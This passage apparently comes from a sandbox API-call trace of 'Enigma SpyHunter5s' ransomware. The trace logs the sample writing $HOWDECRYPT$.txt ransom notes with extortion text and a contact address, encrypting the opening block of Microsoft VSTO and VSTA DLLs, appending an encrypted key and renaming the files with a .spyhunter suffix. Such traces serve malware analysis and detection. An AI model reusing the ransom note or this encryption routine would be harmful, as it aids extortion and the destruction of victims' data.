shared\\VSTO\\10.0\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.740] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.740] WriteFile (in: hFile=0x178, lpBuffer=0x57e3b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e4e0, lpOverlapped=0x0 | out: lpBuffer=0x57e3b7*, lpNumberOfBytesWritten=0x57e4e0*=0x127, lpOverlapped=0x0) returned 1 [0177.741] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.741] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e4e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e4e0*=0x2ac, lpOverlapped=0x0) returned 1 [0177.742] CloseHandle (hObject=0x178) returned 1 [0177.742] GetProcessHeap () returned 0x2c0000 [0177.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5ddc0 | out: hHeap=0x2c0000) returned 1 [0177.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e480 | out: pbBuffer=0x57e480) returned 1 [0177.742] GetProcessHeap () returned 0x2c0000 [0177.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e478*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e478*=0x30) returned 1 [0177.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.743] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 88 [0177.743] StrStrW (lpFirst="VSTOLoaderUI.dll", lpSrch=".txt") returned 0x0 [0177.743] GetProcessHeap () returned 0x2c0000 [0177.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.743] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e43c*=0x2800, lpOverlapped=0x0) returned 1 [0177.744] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.744] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e43c*=0x2800, lpOverlapped=0x0) returned 1 [0177.744] GetProcessHeap () returned 0x2c0000 [0177.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.744] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.744] WriteFile (in: hFile=0x178, lpBuffer=0x57e47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e43c, lpOverlapped=0x0 | out: lpBuffer=0x57e47c*, lpNumberOfBytesWritten=0x57e43c*=0x4, lpOverlapped=0x0) returned 1 [0177.746] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e43c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e43c*=0x30, lpOverlapped=0x0) returned 1 [0177.746] CloseHandle (hObject=0x178) returned 1 [0177.746] GetProcessHeap () returned 0x2c0000 [0177.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.746] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.spyhunter") returned 98 [0177.747] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.spyhunter")) returned 1 [0177.747] GetProcessHeap () returned 0x2c0000 [0177.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.747] GetProcessHeap () returned 0x2c0000 [0177.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.748] GetProcessHeap () returned 0x2c0000 [0177.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5dcc0 | out: hHeap=0x2c0000) returned 1 [0177.748] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e478 | out: pbBuffer=0x57e478) returned 1 [0177.748] GetProcessHeap () returned 0x2c0000 [0177.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.748] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e470*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e470*=0x30) returned 1 [0177.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.749] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 91 [0177.749] StrStrW (lpFirst="VSTOInstallerUI.dll", lpSrch=".txt") returned 0x0 [0177.749] GetProcessHeap () returned 0x2c0000 [0177.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.749] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e434*=0x2760, lpOverlapped=0x0) returned 1 [0177.761] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd8a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.761] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e434*=0x2760, lpOverlapped=0x0) returned 1 [0177.761] GetProcessHeap () returned 0x2c0000 [0177.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.761] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.762] WriteFile (in: hFile=0x178, lpBuffer=0x57e474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x57e474*, lpNumberOfBytesWritten=0x57e434*=0x4, lpOverlapped=0x0) returned 1 [0177.762] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e434*=0x30, lpOverlapped=0x0) returned 1 [0177.762] CloseHandle (hObject=0x178) returned 1 [0177.762] GetProcessHeap () returned 0x2c0000 [0177.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.762] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.spyhunter") returned 101 [0177.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.spyhunter")) returned 1 [0177.763] GetProcessHeap () returned 0x2c0000 [0177.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.763] GetProcessHeap () returned 0x2c0000 [0177.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.763] GetProcessHeap () returned 0x2c0000 [0177.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5dbc0 | out: hHeap=0x2c0000) returned 1 [0177.763] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e478 | out: pbBuffer=0x57e478) returned 1 [0177.763] GetProcessHeap () returned 0x2c0000 [0177.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.763] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e470*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e470*=0x30) returned 1 [0177.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.764] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned 157 [0177.764] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll", lpSrch=".txt") returned 0x0 [0177.764] GetProcessHeap () returned 0x2c0000 [0177.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.764] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e434*=0x2800, lpOverlapped=0x0) returned 1 [0177.772] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.773] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e434*=0x2800, lpOverlapped=0x0) returned 1 [0177.773] GetProcessHeap () returned 0x2c0000 [0177.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.773] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.773] WriteFile (in: hFile=0x178, lpBuffer=0x57e474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x57e474*, lpNumberOfBytesWritten=0x57e434*=0x4, lpOverlapped=0x0) returned 1 [0177.789] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e434, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e434*=0x30, lpOverlapped=0x0) returned 1 [0177.789] CloseHandle (hObject=0x178) returned 1 [0177.790] GetProcessHeap () returned 0x2c0000 [0177.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.790] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.spyhunter") returned 167 [0177.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll.spyhunter")) returned 1 [0177.791] GetProcessHeap () returned 0x2c0000 [0177.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.791] GetProcessHeap () returned 0x2c0000 [0177.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.791] GetProcessHeap () returned 0x2c0000 [0177.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e930e8 | out: hHeap=0x2c0000) returned 1 [0177.791] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e470 | out: pbBuffer=0x57e470) returned 1 [0177.791] GetProcessHeap () returned 0x2c0000 [0177.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.791] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e468*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e468*=0x30) returned 1 [0177.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.792] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll") returned 147 [0177.792] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll", lpSrch=".txt") returned 0x0 [0177.792] GetProcessHeap () returned 0x2c0000 [0177.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0177.792] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e42c*=0x2800, lpOverlapped=0x0) returned 1 [0177.825] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.825] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e42c*=0x2800, lpOverlapped=0x0) returned 1 [0177.825] GetProcessHeap () returned 0x2c0000 [0177.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0177.825] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.825] WriteFile (in: hFile=0x178, lpBuffer=0x57e46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e42c, lpOverlapped=0x0 | out: lpBuffer=0x57e46c*, lpNumberOfBytesWritten=0x57e42c*=0x4, lpOverlapped=0x0) returned 1 [0177.827] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e42c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e42c*=0x30, lpOverlapped=0x0) returned 1 [0177.827] CloseHandle (hObject=0x178) returned 1 [0177.827] GetProcessHeap () returned 0x2c0000 [0177.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.827] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.spyhunter") returned 157 [0177.827] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v10.0.dll.spyhunter")) returned 1 [0177.828] GetProcessHeap () returned 0x2c0000 [0177.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.828] GetProcessHeap () returned 0x2c0000 [0177.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.828] GetProcessHeap () returned 0x2c0000 [0177.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d09ea0 | out: hHeap=0x2c0000) returned 1 [0177.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.830] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.830] WriteFile (in: hFile=0x178, lpBuffer=0x57e3a3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x57e3a3*, lpNumberOfBytesWritten=0x57e4cc*=0x127, lpOverlapped=0x0) returned 1 [0177.831] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.831] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e4cc*=0x2ac, lpOverlapped=0x0) returned 1 [0177.831] CloseHandle (hObject=0x178) returned 1 [0177.831] GetProcessHeap () returned 0x2c0000 [0177.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee7038 | out: hHeap=0x2c0000) returned 1 [0177.831] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e468 | out: pbBuffer=0x57e468) returned 1 [0177.831] GetProcessHeap () returned 0x2c0000 [0177.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.831] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e460*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e460*=0x30) returned 1 [0177.832] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.832] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll") returned 146 [0177.832] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll", lpSrch=".txt") returned 0x0 [0177.832] GetProcessHeap () returned 0x2c0000 [0177.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0177.832] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e424*=0x2800, lpOverlapped=0x0) returned 1 [0177.861] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.861] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e424, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e424*=0x2800, lpOverlapped=0x0) returned 1 [0177.862] GetProcessHeap () returned 0x2c0000 [0177.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0177.862] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.862] WriteFile (in: hFile=0x178, lpBuffer=0x57e464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e424, lpOverlapped=0x0 | out: lpBuffer=0x57e464*, lpNumberOfBytesWritten=0x57e424*=0x4, lpOverlapped=0x0) returned 1 [0177.862] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e424, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e424*=0x30, lpOverlapped=0x0) returned 1 [0177.862] CloseHandle (hObject=0x178) returned 1 [0177.862] GetProcessHeap () returned 0x2c0000 [0177.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 